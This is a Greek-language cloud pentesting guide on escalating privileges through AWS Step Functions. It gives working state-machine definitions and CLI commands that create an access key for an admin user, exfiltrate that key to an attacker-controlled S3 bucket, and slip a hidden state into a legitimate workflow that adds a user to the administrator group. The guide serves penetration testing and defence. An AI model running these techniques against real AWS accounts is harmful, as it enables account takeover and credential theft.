AWS - Step Functions Privesc

Step Functions

Για περισσότερες πληροφορίες σχετικά με αυτή την υπηρεσία AWS, ελέγξτε:

Task Resources

Αυτές οι τεχνικές ανύψωσης προνομίων θα απαιτήσουν τη χρήση ορισμένων πόρων AWS step function προκειμένου να εκτελέσουν τις επιθυμητές ενέργειες ανύψωσης προνομίων.

Για να ελέγξετε όλες τις πιθανές ενέργειες, μπορείτε να μεταβείτε στον δικό σας λογαριασμό AWS, να επιλέξετε την ενέργεια που θα θέλατε να χρησιμοποιήσετε και να δείτε τις παραμέτρους που χρησιμοποιεί, όπως στο:

Ή μπορείτε επίσης να μεταβείτε στην τεκμηρίωση API AWS και να ελέγξετε τα έγγραφα κάθε ενέργειας:

• AddUserToGroup

• GetSecretValue

states:TestState & iam:PassRole

Ένας επιτιθέμενος με τα δικαιώματα states:TestState & iam:PassRole μπορεί να δοκιμάσει οποιαδήποτε κατάσταση και να περάσει οποιονδήποτε ρόλο IAM σε αυτήν χωρίς να δημιουργήσει ή να ενημερώσει μια υπάρχουσα μηχανή καταστάσεων, επιτρέποντας μη εξουσιοδοτημένη πρόσβαση σε άλλες υπηρεσίες AWS με τα δικαιώματα των ρόλων. Συνδυασμένα, αυτά τα δικαιώματα μπορούν να οδηγήσουν σε εκτενείς μη εξουσιοδοτημένες ενέργειες, από την παραποίηση ροών εργασίας για την τροποποίηση δεδομένων έως διαρροές δεδομένων, παραποίηση πόρων και ανύψωση προνομίων.

aws states test-state --definition <value> --role-arn <value> [--input <value>] [--inspection-level <value>] [--reveal-secrets | --no-reveal-secrets]

Τα παρακάτω παραδείγματα δείχνουν πώς να δοκιμάσετε μια κατάσταση που δημιουργεί ένα access key για τον χρήστη admin εκμεταλλευόμενος αυτές τις άδειες και έναν επιτρεπτικό ρόλο του περιβάλλοντος AWS. Αυτός ο επιτρεπτικός ρόλος θα πρέπει να έχει οποιαδήποτε πολιτική υψηλών προνομίων συσχετισμένη με αυτόν (για παράδειγμα arn:aws:iam::aws:policy/AdministratorAccess) που επιτρέπει στην κατάσταση να εκτελεί την ενέργεια iam:CreateAccessKey:

• stateDefinition.json:

{
"Type": "Task",
"Parameters": {
"UserName": "admin"
},
"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
"End": true
}

• Εντολή που εκτελέστηκε για να πραγματοποιηθεί η privesc:

aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam::<account-id>:role/PermissiveRole

{
"output": "{
\"AccessKey\":{
\"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\",
\"CreateDate\":\"2024-07-09T16:59:11Z\",
\"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\",
\"Status\":\"Active\",
\"UserName\":\"admin\"
}
}",
"status": "SUCCEEDED"
}

Πιθανές Επιπτώσεις: Μη εξουσιοδοτημένη εκτέλεση και χειρισμός ροών εργασίας και πρόσβαση σε ευαίσθητους πόρους, που μπορεί να οδηγήσει σε σημαντικές παραβιάσεις ασφάλειας.

states:CreateStateMachine & iam:PassRole & (states:StartExecution | states:StartSyncExecution)

Ένας επιτιθέμενος με το states:CreateStateMachine& iam:PassRole θα μπορούσε να δημιουργήσει μια μηχανή καταστάσεων και να της παρέχει οποιονδήποτε ρόλο IAM, επιτρέποντας μη εξουσιοδοτημένη πρόσβαση σε άλλες υπηρεσίες AWS με τις άδειες του ρόλου. Σε αντίθεση με την προηγούμενη τεχνική privesc (states:TestState & iam:PassRole), αυτή δεν εκτελείται από μόνη της, θα χρειαστεί επίσης να έχετε τις άδειες states:StartExecution ή states:StartSyncExecution (states:StartSyncExecution δεν είναι διαθέσιμη για τυπικές ροές εργασίας, μόνο για εκφρασμένες μηχανές καταστάσεων) προκειμένου να ξεκινήσετε και να εκτελέσετε τη μηχανή καταστάσεων.

# Create a state machine
aws states create-state-machine --name <value> --definition <value> --role-arn <value> [--type <STANDARD | EXPRESS>] [--logging-configuration <value>]\
[--tracing-configuration <enabled=true|false>] [--publish | --no-publish] [--version-description <value>]

# Start a state machine execution
aws states start-execution --state-machine-arn <value> [--name <value>] [--input <value>] [--trace-header <value>]

# Start a Synchronous Express state machine execution
aws states start-sync-execution --state-machine-arn <value> [--name <value>] [--input <value>] [--trace-header <value>]

Τα παρακάτω παραδείγματα δείχνουν πώς να δημιουργήσετε μια μηχανή καταστάσεων που δημιουργεί ένα access key για τον χρήστη admin και εξάγει αυτό το access key σε ένα S3 bucket που ελέγχεται από τον επιτιθέμενο, εκμεταλλευόμενη αυτές τις άδειες και έναν επιεική ρόλο του περιβάλλοντος AWS. Αυτός ο επιεικής ρόλος θα πρέπει να έχει οποιαδήποτε πολιτική υψηλών προνομίων συνδεδεμένη με αυτόν (για παράδειγμα arn:aws:iam::aws:policy/AdministratorAccess) που επιτρέπει στη μηχανή καταστάσεων να εκτελεί τις ενέργειες iam:CreateAccessKey & s3:putObject.

• stateMachineDefinition.json:

{
"Comment": "Malicious state machine to create IAM access key and upload to S3",
"StartAt": "CreateAccessKey",
"States": {
"CreateAccessKey": {
"Type": "Task",
"Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
"Parameters": {
"UserName": "admin"
},
"ResultPath": "$.AccessKeyResult",
"Next": "PrepareS3PutObject"
},
"PrepareS3PutObject": {
"Type": "Pass",
"Parameters": {
"Body.$": "$.AccessKeyResult.AccessKey",
"Bucket": "attacker-controlled-S3-bucket",
"Key": "AccessKey.json"
},
"ResultPath": "$.S3PutObjectParams",
"Next": "PutObject"
},
"PutObject": {
"Type": "Task",
"Resource": "arn:aws:states:::aws-sdk:s3:putObject",
"Parameters": {
"Body.$": "$.S3PutObjectParams.Body",
"Bucket.$": "$.S3PutObjectParams.Bucket",
"Key.$": "$.S3PutObjectParams.Key"
},
"End": true
}
}
}

• Εντολή που εκτελέστηκε για δημιουργία της μηχανής κατάστασης:

aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn arn:aws:iam::123456789012:role/PermissiveRole
{
"stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine",
"creationDate": "2024-07-09T20:29:35.381000+02:00"
}

• Εντολή που εκτελέστηκε για να ξεκινήσει μια εκτέλεση της προηγουμένως δημιουργημένης μηχανής καταστάσεων:

aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine
{
"executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
"startDate": "2024-07-09T20:33:35.466000+02:00"
}

Πιθανές Επιπτώσεις: Μη εξουσιοδοτημένη εκτέλεση και χειρισμός ροών εργασίας και πρόσβαση σε ευαίσθητους πόρους, που μπορεί να οδηγήσει σε σημαντικές παραβιάσεις ασφάλειας.

states:UpdateStateMachine & (όχι πάντα απαραίτητο) iam:PassRole

Ένας επιτιθέμενος με την άδεια states:UpdateStateMachine θα μπορούσε να τροποποιήσει τον ορισμό μιας μηχανής καταστάσεων, προσθέτοντας επιπλέον κρυφές καταστάσεις που θα μπορούσαν να καταλήξουν σε κλιμάκωση προνομίων. Με αυτόν τον τρόπο, όταν ένας νόμιμος χρήστης ξεκινά μια εκτέλεση της μηχανής καταστάσεων, αυτή η νέα κακόβουλη κρυφή κατάσταση θα εκτελείται και η κλιμάκωση προνομίων θα είναι επιτυχής.

Ανάλογα με το πόσο επιτρεπτικός είναι ο IAM Ρόλος που σχετίζεται με τη μηχανή καταστάσεων, ένας επιτιθέμενος θα αντιμετωπίσει 2 καταστάσεις:

1. Επιτρεπτικός IAM Ρόλος: Εάν ο IAM Ρόλος που σχετίζεται με τη μηχανή καταστάσεων είναι ήδη επιτρεπτικός (έχει για παράδειγμα την πολιτική arn:aws:iam::aws:policy/AdministratorAccess συνημμένη), τότε η άδεια iam:PassRole δεν θα απαιτείται προκειμένου να κλιμακωθούν τα προνόμια, καθώς δεν θα είναι απαραίτητο να ενημερωθεί και ο IAM Ρόλος, με τον ορισμό της μηχανής καταστάσεων να είναι αρκετός.

2. Μη επιτρεπτικός IAM Ρόλος: Σε αντίθεση με την προηγούμενη περίπτωση, εδώ ένας επιτιθέμενος θα απαιτήσει επίσης την άδεια iam:PassRole καθώς θα είναι απαραίτητο να συσχετιστεί ένας επιτρεπτικός IAM Ρόλος με τη μηχανή καταστάσεων εκτός από την τροποποίηση του ορισμού της μηχανής καταστάσεων.

aws states update-state-machine --state-machine-arn <value> [--definition <value>] [--role-arn <value>] [--logging-configuration <value>] \
[--tracing-configuration <enabled=true|false>] [--publish | --no-publish] [--version-description <value>]

Τα παρακάτω παραδείγματα δείχνουν πώς να ενημερώσετε μια νόμιμη μηχανή κατάστασης που απλώς καλεί μια συνάρτηση Lambda HelloWorld, προκειμένου να προσθέσετε μια επιπλέον κατάσταση που προσθέτει τον χρήστη unprivilegedUser στην ομάδα IAM administrator. Με αυτόν τον τρόπο, όταν ένας νόμιμος χρήστης ξεκινά μια εκτέλεση της ενημερωμένης μηχανής κατάστασης, αυτή η νέα κακόβουλη κρυφή κατάσταση θα εκτελείται και η κλιμάκωση προνομίων θα είναι επιτυχής.

{
"Comment": "Hello world from Lambda state machine",
"StartAt": "Start PassState",
"States": {
"Start PassState": {
"Type": "Pass",
"Next": "LambdaInvoke"
},
"LambdaInvoke": {
"Type": "Task",
"Resource": "arn:aws:states:::lambda:invoke",
"Parameters": {
"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
},
"Next": "End PassState"
},
"End PassState": {
"Type": "Pass",
"End": true
}
}
}

{
"Comment": "Hello world from Lambda state machine",
"StartAt": "Start PassState",
"States": {
"Start PassState": {
"Type": "Pass",
"Next": "LambdaInvoke"
},
"LambdaInvoke": {
"Type": "Task",
"Resource": "arn:aws:states:::lambda:invoke",
"Parameters": {
"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
},
"Next": "AddUserToGroup"
},
"AddUserToGroup": {
"Type": "Task",
"Parameters": {
"GroupName": "administrator",
"UserName": "unprivilegedUser"
},
"Resource": "arn:aws:states:::aws-sdk:iam:addUserToGroup",
"Next": "End PassState"
},
"End PassState": {
"Type": "Pass",
"End": true
}
}
}

• Εντολή που εκτελέστηκε για να ενημερώσει τη νόμιμη μηχανή κατάστασης:

aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json
{
"updateDate": "2024-07-10T20:07:10.294000+02:00",
"revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
}

Πιθανές Επιπτώσεις: Μη εξουσιοδοτημένη εκτέλεση και χειρισμός ροών εργασίας και πρόσβαση σε ευαίσθητους πόρους, που μπορεί να οδηγήσει σε σημαντικές παραβιάσεις ασφάλειας.